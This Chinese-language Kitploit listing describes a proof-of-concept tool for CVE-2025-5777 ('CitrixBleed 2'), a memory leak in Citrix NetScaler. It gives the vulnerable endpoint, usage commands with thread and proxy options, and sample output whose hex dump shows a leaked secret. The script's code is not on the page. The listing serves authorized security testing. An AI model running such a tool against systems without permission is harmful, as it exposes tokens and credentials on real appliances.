Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-5777 — Citrix NetScaler 内存泄漏 PoC | Kitploit
工具/GitHubGitHub/0xgh057r3c0n/cve-2025-5777
漏洞分析漏洞利用信息收集Web安全渗透测试红队
GitHub0xgh057r3c0n/cve-2025-5777

CVE-2025-5777

Citrix NetScaler 内存泄漏 PoC

查看仓库
2101年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-5777 - Citrix NetScaler 内存泄漏 PoC

📌 描述

此脚本利用了标识为 CVE-2025-5777(称为 CitrixBleed 2)的 Citrix NetScaler ADC/Gateway 设备中的严重内存泄露漏洞。它通过 /p/u/doAuthentication.do 端点触发内存泄漏,暴露包含敏感数据(如 XML 片段、令牌以及可能的凭据)的未初始化内存。

  • 📅 CVE ID: CVE-2025-5777
  • ⚙️ 影响: 信息泄露
  • 🧑‍💻 作者: [0xgh057r3c0n]
  • 🧵 并发: 使用 aiohttp 异步
  • 📦 依赖: aiohttp, colorama

🚀 功能

  • 使用 asyncio + aiohttp 的异步批量请求引擎
  • 泄露内存片段的十六进制转储
  • 自动检测 <InitialValue> 内存泄露
  • 详细模式,用于调试和响应预览
  • 优雅的中断处理(Ctrl+C)

🧪 用法

root@kitploit:~
python3 CVE-2025-5777.py http://<target> [options]

🔧 选项

选项描述
-v, --verbose启用详细调试输出
-p <proxy>使用 HTTP 代理(例如 http://127.0.0.1:8080)
-t <threads>并发请求数(默认:10)

📥 示例

root@kitploit:~
python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5

📤 示例输出

root@kitploit:~
_____________   _______________         _______________   ________   .________          .___________________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
        \/                  \/                  \/     \/         \/       \/                 \/                             

         Citrix NetScaler Memory Leak PoC (CVE-2025-5777)
                     Author: 0xgh057r3c0n

[🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Status: 200
[✔️ ] Found InitialValue Memory Leak!
[🧠] Hex Dump:
------------------------------------------------------------------------
00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
------------------------------------------------------------------------

[✔️ ] Leak confirmed. Continuing extraction...

⚠️ 免责声明

此概念验证仅用于教育和授权的安全测试。 未经许可扫描或利用非您拥有的系统是非法的。


下载工具